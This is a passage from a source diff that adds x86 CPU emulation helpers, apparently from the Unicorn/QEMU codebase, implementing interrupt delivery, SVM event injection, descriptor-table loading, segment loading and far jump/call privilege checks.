DESC_P_MASK | + DESC_S_MASK | (3 << DESC_DPL_SHIFT) | + DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK | + DESC_L_MASK); + env->eip = env->regs[R_ECX]; + } else { + cpu_x86_load_seg_cache(env, R_CS, selector | 3, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | (3 << DESC_DPL_SHIFT) | + DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); + env->eip = (uint32_t)env->regs[R_ECX]; + } + cpu_x86_load_seg_cache(env, R_SS, selector + 8, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | (3 << DESC_DPL_SHIFT) | + DESC_W_MASK | DESC_A_MASK); + } else { + env->eflags |= IF_MASK; + cpu_x86_load_seg_cache(env, R_CS, selector | 3, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | (3 << DESC_DPL_SHIFT) | + DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); + env->eip = (uint32_t)env->regs[R_ECX]; + cpu_x86_load_seg_cache(env, R_SS, selector + 8, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | (3 << DESC_DPL_SHIFT) | + DESC_W_MASK | DESC_A_MASK); + } +} +#endif + +/* real mode interrupt */ +static void do_interrupt_real(CPUX86State *env, int intno, int is_int, + int error_code, unsigned int next_eip) // qq +{ + SegmentCache *dt; + target_ulong ptr, ssp; + int selector; + uint32_t offset, esp; + uint32_t old_cs, old_eip; + + /* real mode (simpler!) */ + dt = &env->idt; + if (intno * 4 + 3 > dt->limit) { + raise_exception_err(env, EXCP0D_GPF, intno * 8 + 2); + } + ptr = dt->base + intno * 4; + offset = cpu_lduw_kernel(env, ptr); + selector = cpu_lduw_kernel(env, ptr + 2); + esp = env->regs[R_ESP]; + ssp = env->segs[R_SS].base; + if (is_int) { + old_eip = next_eip; + } else { + old_eip = env->eip; + } + old_cs = env->segs[R_CS].selector; + /* XXX: use SS segment size? */ + PUSHW(ssp, esp, 0xffff, cpu_compute_eflags(env)); + PUSHW(ssp, esp, 0xffff, old_cs); + PUSHW(ssp, esp, 0xffff, old_eip); + + /* update processor state */ + env->regs[R_ESP] = (env->regs[R_ESP] & ~0xffff) | (esp & 0xffff); + env->eip = offset; + env->segs[R_CS].selector = selector; + env->segs[R_CS].base = (selector << 4); + env->eflags &= ~(IF_MASK | TF_MASK | AC_MASK | RF_MASK); +} + +#if defined(CONFIG_USER_ONLY) +/* fake user mode interrupt */ +static void do_interrupt_user(CPUX86State *env, int intno, int is_int, + int error_code, target_ulong next_eip) +{ + SegmentCache *dt; + target_ulong ptr; + int dpl, cpl, shift; + uint32_t e2; + + dt = &env->idt; + if (env->hflags & HF_LMA_MASK) { + shift = 4; + } else { + shift = 3; + } + ptr = dt->base + (intno << shift); + e2 = cpu_ldl_kernel(env, ptr + 4); + + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + cpl = env->hflags & HF_CPL_MASK; + /* check privilege if software int */ + if (is_int && dpl < cpl) { + raise_exception_err(env, EXCP0D_GPF, (intno << shift) + 2); + } + + /* Since we emulate only user space, we cannot do more than + exiting the emulation with the suitable exception and error + code. So update EIP for INT 0x80 and EXCP_SYSCALL. */ + if (is_int || intno == EXCP_SYSCALL) { + env->eip = next_eip; + } +} + +#else + +static void handle_even_inj(CPUX86State *env, int intno, int is_int, + int error_code, int is_hw, int rm) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + uint32_t event_inj = ldl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + control.event_inj)); + + if (!(event_inj & SVM_EVTINJ_VALID)) { + int type; + + if (is_int) { + type = SVM_EVTINJ_TYPE_SOFT; + } else { + type = SVM_EVTINJ_TYPE_EXEPT; + } + event_inj = intno | type | SVM_EVTINJ_VALID; + if (!rm && exception_has_error_code(intno)) { + event_inj |= SVM_EVTINJ_VALID_ERR; + stl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + control.event_inj_err), + error_code); + } + stl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.event_inj), + event_inj); + } +} +#endif + +/* + * Begin execution of an interruption. is_int is TRUE if coming from + * the int instruction. next_eip is the env->eip value AFTER the interrupt + * instruction. It is only relevant if is_int is TRUE. + */ +static void do_interrupt_all(X86CPU *cpu, int intno, int is_int, + int error_code, target_ulong next_eip, int is_hw) +{ + CPUX86State *env = &cpu->env; + + if (qemu_loglevel_mask(CPU_LOG_INT)) { + if ((env->cr[0] & CR0_PE_MASK)) { + //static int count; + + //qemu_log("%6d: v=%02x e=%04x i=%d cpl=%d IP=%04x:" TARGET_FMT_lx + // " pc=" TARGET_FMT_lx " SP=%04x:" TARGET_FMT_lx, + // count, intno, error_code, is_int, + // env->hflags & HF_CPL_MASK, + // env->segs[R_CS].selector, env->eip, + // (int)env->segs[R_CS].base + env->eip, + // env->segs[R_SS].selector, env->regs[R_ESP]); + if (intno == 0x0e) { + qemu_log(" CR2=" TARGET_FMT_lx, env->cr[2]); + } else { + qemu_log(" env->regs[R_EAX]=" TARGET_FMT_lx, env->regs[R_EAX]); + } + qemu_log("\n"); + log_cpu_state(CPU(cpu), CPU_DUMP_CCOP); +#if 0 + { + int i; + target_ulong ptr; + + qemu_log(" code="); + ptr = env->segs[R_CS].base + env->eip; + for (i = 0; i < 16; i++) { + qemu_log(" %02x", ldub(ptr + i)); + } + qemu_log("\n"); + } +#endif + //count++; + } + } + if (env->cr[0] & CR0_PE_MASK) { +#if !defined(CONFIG_USER_ONLY) + if (env->hflags & HF_SVMI_MASK) { + handle_even_inj(env, intno, is_int, error_code, is_hw, 0); + } +#endif +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + do_interrupt64(env, intno, is_int, error_code, next_eip, is_hw); + } else +#endif + { + do_interrupt_protected(env, intno, is_int, error_code, next_eip, + is_hw); + } + } else { +#if !defined(CONFIG_USER_ONLY) + if (env->hflags & HF_SVMI_MASK) { + handle_even_inj(env, intno, is_int, error_code, is_hw, 1); + } +#endif + do_interrupt_real(env, intno, is_int, error_code, next_eip); + } + +#if !defined(CONFIG_USER_ONLY) + if (env->hflags & HF_SVMI_MASK) { + CPUState *cs = CPU(cpu); + uint32_t event_inj = ldl_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, + control.event_inj)); + + stl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.event_inj), + event_inj & ~SVM_EVTINJ_VALID); + } +#endif +} + +void x86_cpu_do_interrupt(CPUState *cs) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + +#if defined(CONFIG_USER_ONLY) + /* if user mode only, we simulate a fake exception + which will be handled outside the cpu execution + loop */ + do_interrupt_user(env, cs->exception_index, + env->exception_is_int, + env->error_code, + env->exception_next_eip); + /* successfully delivered */ + env->old_exception = -1; +#else + /* simulate a real cpu exception. On i386, it can + trigger new exceptions, but we do not handle + double or triple faults yet. */ + do_interrupt_all(cpu, cs->exception_index, + env->exception_is_int, + env->error_code, + env->exception_next_eip, 0); + /* successfully delivered */ + env->old_exception = -1; +#endif +} + +void do_interrupt_x86_hardirq(CPUX86State *env, int intno, int is_hw) +{ + do_interrupt_all(x86_env_get_cpu(env), intno, 0, 0, 0, is_hw); +} + +bool x86_cpu_exec_interrupt(CPUState *cs, int interrupt_request) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + bool ret = false; + +#if !defined(CONFIG_USER_ONLY) + if (interrupt_request & CPU_INTERRUPT_POLL) { + cs->interrupt_request &= ~CPU_INTERRUPT_POLL; + apic_poll_irq(cpu->apic_state); + } +#endif + if (interrupt_request & CPU_INTERRUPT_SIPI) { + do_cpu_sipi(cpu); + } else if (env->hflags2 & HF2_GIF_MASK) { + if ((interrupt_request & CPU_INTERRUPT_SMI) && + !(env->hflags & HF_SMM_MASK)) { + cpu_svm_check_intercept_param(env, SVM_EXIT_SMI, 0); + cs->interrupt_request &= ~CPU_INTERRUPT_SMI; + do_smm_enter(cpu); + ret = true; + } else if ((interrupt_request & CPU_INTERRUPT_NMI) && + !(env->hflags2 & HF2_NMI_MASK)) { + cs->interrupt_request &= ~CPU_INTERRUPT_NMI; + env->hflags2 |= HF2_NMI_MASK; + do_interrupt_x86_hardirq(env, EXCP02_NMI, 1); + ret = true; + } else if (interrupt_request & CPU_INTERRUPT_MCE) { + cs->interrupt_request &= ~CPU_INTERRUPT_MCE; + do_interrupt_x86_hardirq(env, EXCP12_MCHK, 0); + ret = true; + } else if ((interrupt_request & CPU_INTERRUPT_HARD) && + (((env->hflags2 & HF2_VINTR_MASK) && + (env->hflags2 & HF2_HIF_MASK)) || + (!(env->hflags2 & HF2_VINTR_MASK) && + (env->eflags & IF_MASK && + !(env->hflags & HF_INHIBIT_IRQ_MASK))))) { + int intno; + cpu_svm_check_intercept_param(env, SVM_EXIT_INTR, 0); + cs->interrupt_request &= ~(CPU_INTERRUPT_HARD | + CPU_INTERRUPT_VIRQ); + intno = cpu_get_pic_interrupt(env); + qemu_log_mask(CPU_LOG_TB_IN_ASM, + "Servicing hardware INT=0x%02x\n", intno); + do_interrupt_x86_hardirq(env, intno, 1); + /* ensure that no TB jump will be modified as + the program flow was changed */ + ret = true; +#if !defined(CONFIG_USER_ONLY) + } else if ((interrupt_request & CPU_INTERRUPT_VIRQ) && + (env->eflags & IF_MASK) && + !(env->hflags & HF_INHIBIT_IRQ_MASK)) { + int intno; + /* FIXME: this should respect TPR */ + cpu_svm_check_intercept_param(env, SVM_EXIT_VINTR, 0); + intno = ldl_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, control.int_vector)); + qemu_log_mask(CPU_LOG_TB_IN_ASM, + "Servicing virtual hardware INT=0x%02x\n", intno); + do_interrupt_x86_hardirq(env, intno, 1); + cs->interrupt_request &= ~CPU_INTERRUPT_VIRQ; + ret = true; +#endif + } + } + + return ret; +} + +void helper_enter_level(CPUX86State *env, int level, int data32, + target_ulong t1) +{ + target_ulong ssp; + uint32_t esp_mask, esp, ebp; + + esp_mask = get_sp_mask(env->segs[R_SS].flags); + ssp = env->segs[R_SS].base; + ebp = env->regs[R_EBP]; + esp = env->regs[R_ESP]; + if (data32) { + /* 32 bit */ + esp -= 4; + while (--level) { + esp -= 4; + ebp -= 4; + cpu_stl_data(env, ssp + (esp & esp_mask), + cpu_ldl_data(env, ssp + (ebp & esp_mask))); + } + esp -= 4; + cpu_stl_data(env, ssp + (esp & esp_mask), t1); + } else { + /* 16 bit */ + esp -= 2; + while (--level) { + esp -= 2; + ebp -= 2; + cpu_stw_data(env, ssp + (esp & esp_mask), + cpu_lduw_data(env, ssp + (ebp & esp_mask))); + } + esp -= 2; + cpu_stw_data(env, ssp + (esp & esp_mask), t1); + } +} + +#ifdef TARGET_X86_64 +void helper_enter64_level(CPUX86State *env, int level, int data64, + target_ulong t1) +{ + target_ulong esp, ebp; + + ebp = env->regs[R_EBP]; + esp = env->regs[R_ESP]; + + if (data64) { + /* 64 bit */ + esp -= 8; + while (--level) { + esp -= 8; + ebp -= 8; + cpu_stq_data(env, esp, cpu_ldq_data(env, ebp)); + } + esp -= 8; + cpu_stq_data(env, esp, t1); + } else { + /* 16 bit */ + esp -= 2; + while (--level) { + esp -= 2; + ebp -= 2; + cpu_stw_data(env, esp, cpu_lduw_data(env, ebp)); + } + esp -= 2; + cpu_stw_data(env, esp, t1); + } +} +#endif + +void helper_lldt(CPUX86State *env, int selector) +{ + SegmentCache *dt; + uint32_t e1, e2; + int index, entry_limit; + target_ulong ptr; + + selector &= 0xffff; + if ((selector & 0xfffc) == 0) { + /* XXX: NULL selector case: invalid LDT */ + env->ldt.base = 0; + env->ldt.limit = 0; + } else { + if (selector & 0x4) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + dt = &env->gdt; + index = selector & ~7; +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + entry_limit = 15; + } else +#endif + { + entry_limit = 7; + } + if ((index + entry_limit) > dt->limit) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + ptr = dt->base + index; + e1 = cpu_ldl_kernel(env, ptr); + e2 = cpu_ldl_kernel(env, ptr + 4); + if ((e2 & DESC_S_MASK) || ((e2 >> DESC_TYPE_SHIFT) & 0xf) != 2) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); + } +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + uint32_t e3; + + e3 = cpu_ldl_kernel(env, ptr + 8); + load_seg_cache_raw_dt(&env->ldt, e1, e2); + env->ldt.base |= (target_ulong)e3 << 32; + } else +#endif + { + load_seg_cache_raw_dt(&env->ldt, e1, e2); + } + } + env->ldt.selector = selector; +} + +void helper_ltr(CPUX86State *env, int selector) +{ + SegmentCache *dt; + uint32_t e1, e2; + int index, type, entry_limit; + target_ulong ptr; + + selector &= 0xffff; + if ((selector & 0xfffc) == 0) { + /* NULL selector case: invalid TR */ + env->tr.base = 0; + env->tr.limit = 0; + env->tr.flags = 0; + } else { + if (selector & 0x4) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + dt = &env->gdt; + index = selector & ~7; +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + entry_limit = 15; + } else +#endif + { + entry_limit = 7; + } + if ((index + entry_limit) > dt->limit) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + ptr = dt->base + index; + e1 = cpu_ldl_kernel(env, ptr); + e2 = cpu_ldl_kernel(env, ptr + 4); + type = (e2 >> DESC_TYPE_SHIFT) & 0xf; + if ((e2 & DESC_S_MASK) || + (type != 1 && type != 9)) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); + } +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + uint32_t e3, e4; + + e3 = cpu_ldl_kernel(env, ptr + 8); + e4 = cpu_ldl_kernel(env, ptr + 12); + if ((e4 >> DESC_TYPE_SHIFT) & 0xf) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + load_seg_cache_raw_dt(&env->tr, e1, e2); + env->tr.base |= (target_ulong)e3 << 32; + } else +#endif + { + load_seg_cache_raw_dt(&env->tr, e1, e2); + } + e2 |= DESC_TSS_BUSY_MASK; + cpu_stl_kernel(env, ptr + 4, e2); + } + env->tr.selector = selector; +} + +// Unicorn: check the arguments before run cpu_x86_load_seg(). +int uc_check_cpu_x86_load_seg(CPUX86State *env, int seg_reg, int sel) +{ + int selector; + uint32_t e2; + int cpl, dpl, rpl; + SegmentCache *dt; + int index; + target_ulong ptr; + + if (!(env->cr[0] & CR0_PE_MASK) || (env->eflags & VM_MASK)) { + return 0; + } else { + selector = sel & 0xffff; + cpl = env->hflags & HF_CPL_MASK; + if ((selector & 0xfffc) == 0) { + /* null selector case */ + if (seg_reg == R_SS +#ifdef TARGET_X86_64 + && (!(env->hflags & HF_CS64_MASK) || cpl == 3) +#endif + ) { + return UC_ERR_EXCEPTION; + } + return 0; + } else { + if (selector & 0x4) { + dt = &env->ldt; + } else { + dt = &env->gdt; + } + index = selector & ~7; + if ((index + 7) > dt->limit) { + return UC_ERR_EXCEPTION; + } + ptr = dt->base + index; + e2 = cpu_ldl_kernel(env, ptr + 4); + + if (!(e2 & DESC_S_MASK)) { + return UC_ERR_EXCEPTION; + } + rpl = selector & 3; + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (seg_reg == R_SS) { + /* must be writable segment */ + if ((e2 & DESC_CS_MASK) || !(e2 & DESC_W_MASK)) { + return UC_ERR_EXCEPTION; + } + if (rpl != cpl || dpl != cpl) { + return UC_ERR_EXCEPTION; + } + } else { + /* must be readable segment */ + if ((e2 & (DESC_CS_MASK | DESC_R_MASK)) == DESC_CS_MASK) { + return UC_ERR_EXCEPTION; + } + + if (!(e2 & DESC_CS_MASK) || !(e2 & DESC_C_MASK)) { + /* if not conforming code, test rights */ + if (dpl < cpl || dpl < rpl) { + return UC_ERR_EXCEPTION; + } + } + } + + if (!(e2 & DESC_P_MASK)) { + if (seg_reg == R_SS) { + return UC_ERR_EXCEPTION; + } else { + return UC_ERR_EXCEPTION; + } + } + } + } + + return 0; +} + +/* only works if protected mode and not VM86. seg_reg must be != R_CS */ +void helper_load_seg(CPUX86State *env, int seg_reg, int selector) +{ + uint32_t e1, e2; + int cpl, dpl, rpl; + SegmentCache *dt; + int index; + target_ulong ptr; + + selector &= 0xffff; + cpl = env->hflags & HF_CPL_MASK; + if ((selector & 0xfffc) == 0) { + /* null selector case */ + if (seg_reg == R_SS +#ifdef TARGET_X86_64 + && (!(env->hflags & HF_CS64_MASK) || cpl == 3) +#endif + ) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + cpu_x86_load_seg_cache(env, seg_reg, selector, 0, 0, 0); + } else { + + if (selector & 0x4) { + dt = &env->ldt; + } else { + dt = &env->gdt; + } + index = selector & ~7; + if ((index + 7) > dt->limit) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + ptr = dt->base + index; + e1 = cpu_ldl_kernel(env, ptr); + e2 = cpu_ldl_kernel(env, ptr + 4); + + if (!(e2 & DESC_S_MASK)) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + rpl = selector & 3; + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (seg_reg == R_SS) { + /* must be writable segment */ + if ((e2 & DESC_CS_MASK) || !(e2 & DESC_W_MASK)) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (rpl != cpl || dpl != cpl) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + } else { + /* must be readable segment */ + if ((e2 & (DESC_CS_MASK | DESC_R_MASK)) == DESC_CS_MASK) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + + if (!(e2 & DESC_CS_MASK) || !(e2 & DESC_C_MASK)) { + /* if not conforming code, test rights */ + if (dpl < cpl || dpl < rpl) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + } + } + + if (!(e2 & DESC_P_MASK)) { + if (seg_reg == R_SS) { + raise_exception_err(env, EXCP0C_STACK, selector & 0xfffc); + } else { + raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); + } + } + + /* set the access bit if not already set */ + if (!(e2 & DESC_A_MASK)) { + e2 |= DESC_A_MASK; + cpu_stl_kernel(env, ptr + 4, e2); + } + + cpu_x86_load_seg_cache(env, seg_reg, selector, + get_seg_base(e1, e2), + get_seg_limit(e1, e2), + e2); +#if 0 + qemu_log("load_seg: sel=0x%04x base=0x%08lx limit=0x%08lx flags=%08x\n", + selector, (unsigned long)sc->base, sc->limit, sc->flags); +#endif + } +} + +/* protected mode jump */ +void helper_ljmp_protected(CPUX86State *env, int new_cs, target_ulong new_eip, + int next_eip_addend) +{ + int gate_cs, type; + uint32_t e1, e2, cpl, dpl, rpl, limit; + target_ulong next_eip; + + if ((new_cs & 0xfffc) == 0) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + if (load_segment(env, &e1, &e2, new_cs) != 0) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + cpl = env->hflags & HF_CPL_MASK; + if (e2 & DESC_S_MASK) { + if (!(e2 & DESC_CS_MASK)) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (e2 & DESC_C_MASK) { + /* conforming code segment */ + if (dpl > cpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + } else { + /* non conforming code segment */ + rpl = new_cs & 3; + if (rpl > cpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + if (dpl != cpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, new_cs & 0xfffc); + } + limit = get_seg_limit(e1, e2); + if (new_eip > limit && + !(env->hflags & HF_LMA_MASK) && !(e2 & DESC_L_MASK)) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + cpu_x86_load_seg_cache(env, R_CS, (new_cs & 0xfffc) | cpl, + get_seg_base(e1, e2), limit, e2); + env->eip = new_eip; + } else { + /* jump to call or task gate */ + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + rpl = new_cs & 3; + cpl = env->hflags & HF_CPL_MASK; + type = (e2 >> DESC_TYPE_SHIFT) & 0xf; + switch (type) { + case 1: /* 286 TSS */ + case 9: /* 386 TSS */ + case 5: /* task gate */ + if (dpl < cpl || dpl < rpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + next_eip = env->eip + next_eip_addend; + switch_tss(env, new_cs, e1, e2, SWITCH_TSS_JMP, next_eip); + break; + case 4: /* 286 call gate */ + case 12: /* 386 call gate */ + if ((dpl < cpl) || (dpl < rpl)) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, new_cs & 0xfffc); + } + gate_cs = e1 >> 16; + new_eip = (e1 & 0xffff); + if (type == 12) { + new_eip |= (e2 & 0xffff0000); + } + if (load_segment(env, &e1, &e2, gate_cs) != 0) { + raise_exception_err(env, EXCP0D_GPF, gate_cs & 0xfffc); + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + /* must be code segment */ + if (((e2 & (DESC_S_MASK | DESC_CS_MASK)) != + (DESC_S_MASK | DESC_CS_MASK))) { + raise_exception_err(env, EXCP0D_GPF, gate_cs & 0xfffc); + } + if (((e2 & DESC_C_MASK) && (dpl > cpl)) || + (!(e2 & DESC_C_MASK) && (dpl != cpl))) { + raise_exception_err(env, EXCP0D_GPF, gate_cs & 0xfffc); + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0D_GPF, gate_cs & 0xfffc); + } + limit = get_seg_limit(e1, e2); + if (new_eip > limit) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + cpu_x86_load_seg_cache(env, R_CS, (gate_cs & 0xfffc) | cpl, + get_seg_base(e1, e2), limit, e2); + env->eip = new_eip; + break; + default: + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + break; + } + } +} + +/* real mode call */ +void helper_lcall_real(CPUX86State *env, int new_cs, target_ulong new_eip1, + int shift, int next_eip) +{ + int new_eip; + uint32_t esp, esp_mask; + target_ulong ssp; + + new_eip = new_eip1; + esp = env->regs[R_ESP]; + esp_mask = get_sp_mask(env->segs[R_SS].flags); + ssp = env->segs[R_SS].base; + if (shift) { + PUSHL(ssp, esp, esp_mask, env->segs[R_CS].selector); + PUSHL(ssp, esp, esp_mask, next_eip); + } else { + PUSHW(ssp, esp, esp_mask, env->segs[R_CS].selector); + PUSHW(ssp, esp, esp_mask, next_eip); + } + + SET_ESP(esp, esp_mask); + env->eip = new_eip; + env->segs[R_CS].selector = new_cs; + env->segs[R_CS].base = (new_cs << 4); +} + +/* protected mode call */ +void helper_lcall_protected(CPUX86State *env, int new_cs, target_ulong new_eip, + int shift, int next_eip_addend) +{ + int new_stack, i; + uint32_t e1, e2, cpl, dpl, rpl, selector, offset, param_count; + uint32_t ss = 0, ss_e1 = 0, ss_e2 = 0, sp, type, ss_dpl, sp_mask; + uint32_t val, limit, old_sp_mask; + target_ulong ssp, old_ssp, next_eip; + + next_eip = env->eip + next_eip_addend; + LOG_PCALL("lcall %04x:%08x s=%d\n", new_cs, (uint32_t)new_eip, shift); + LOG_PCALL_STATE(CPU(x86_env_get_cpu(env))); + if ((new_cs & 0xfffc) == 0) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + if (load_segment(env, &e1, &e2, new_cs) != 0) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + cpl = env->hflags & HF_CPL_MASK; + LOG_PCALL("desc=%08x:%08x\n", e1, e2); + if (e2 & DESC_S_MASK) { + if (!(e2 & DESC_CS_MASK)) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (e2 & DESC_C_MASK) { + /* conforming code segment */ + if (dpl > cpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + } else { + /* non conforming code segment */ + rpl = new_cs & 3; + if (rpl > cpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + if (dpl != cpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, new_cs & 0xfffc); + } + +#ifdef TARGET_X86_64 + /* XXX: check 16/32 bit cases in long mode */ + if (shift == 2) { + target_ulong rsp; + + /* 64 bit case */ + rsp = env->regs[R_ESP]; + PUSHQ(rsp, env->segs[R_CS].selector); + PUSHQ(rsp, next_eip); + /* from this point, not restartable */ + env->regs[R_ESP] = rsp; + cpu_x86_load_seg_cache(env, R_CS, (new_cs & 0xfffc) | cpl, + get_seg_base(e1, e2), + get_seg_limit(e1, e2), e2); + env->eip = new_eip; + } else +#endif + { + sp = env->regs[R_ESP]; + sp_mask = get_sp_mask(env->segs[R_SS].flags); + ssp = env->segs[R_SS].base; + if (shift) { + PUSHL(ssp, sp, sp_mask, env->segs[R_CS].selector); + PUSHL(ssp, sp, sp_mask, next_eip); + } else { + PUSHW(ssp, sp, sp_mask, env->segs[R_CS].selector); + PUSHW(ssp, sp, sp_mask, next_eip); + } + + limit = get_seg_limit(e1, e2); + if (new_eip > limit) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + /* from this point, not restartable */ + SET_ESP(sp, sp_mask); + cpu_x86_load_seg_cache(env, R_CS, (new_cs & 0xfffc) | cpl, + get_seg_base(e1, e2), limit, e2); + env->eip = new_eip; + } + } else { + /* check gate type */ + type = (e2 >> DESC_TYPE_SHIFT) & 0x1f; + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + rpl = new_cs & 3; + switch (type) { + case 1: /* available 286 TSS */ + case 9: /* available 386 TSS */ + case 5: /* task gate */ + if (dpl < cpl || dpl < rpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + switch_tss(env, new_cs, e1, e2, SWITCH_TSS_CALL, next_eip); + return; + case 4: /* 286 call gate */ + case 12: /* 386 call gate */ + break; + default: + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + break; + } + shift = type >> 3; + + if (dpl < cpl || dpl < rpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + /* check valid bit */ + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, new_cs & 0xfffc); + } + selector = e1 >> 16; + offset = (e2 & 0xffff0000) | (e1 & 0x0000ffff); + param_count = e2 & 0x1f; + if ((selector & 0xfffc) == 0) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + + if (load_segment(env, &e1, &e2, selector) != 0) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (!(e2 & DESC_S_MASK) || !(e2 & (DESC_CS_MASK))) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (dpl > cpl) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); + } + + if (!(e2 & DESC_C_MASK) && dpl < cpl) { + /* to inner privilege */ + get_ss_esp_from_tss(env, &ss, &sp, dpl); + LOG_PCALL("new ss:esp=%04x:%08x param_count=%d env->regs[R_ESP]=" + TARGET_FMT_lx "\n", ss, sp, param_count, + env->regs[R_ESP]); + if ((ss & 0xfffc) == 0) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + if ((ss & 3) != dpl) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + if (load_segment(env, &ss_e1, &ss_e2, ss) != 0) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + ss_dpl = (ss_e2 >> DESC_DPL_SHIFT) & 3; + if (ss_dpl != dpl) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + if (!(ss_e2 & DESC_S_MASK) || + (ss_e2 & DESC_CS_MASK) || + !(ss_e2 & DESC_W_MASK)) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + if (!(ss_e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + + /* push_size = ((param_count * 2) + 8) << shift; */ + + old_sp_mask = get_sp_mask(env->segs[R_SS].flags); + old_ssp = env->segs[R_SS].base; + + sp_mask = get_sp_mask(ss_e2); + ssp = get_seg_base(ss_e1, ss_e2); + if (shift) { + PUSHL(ssp, sp, sp_mask, env->segs[R_SS].selector); + PUSHL(ssp, sp, sp_mask, env->regs[R_ESP]); + for (i = param_count - 1; i >= 0; i--) { + val = cpu_ldl_kernel(env, old_ssp + + ((env->regs[R_ESP] + i * 4) & + old_sp_mask)); + PUSHL(ssp, sp, sp_mask, val); + } + } else { + PUSHW(ssp, sp, sp_mask, env->segs[R_SS].selector); + PUSHW(ssp, 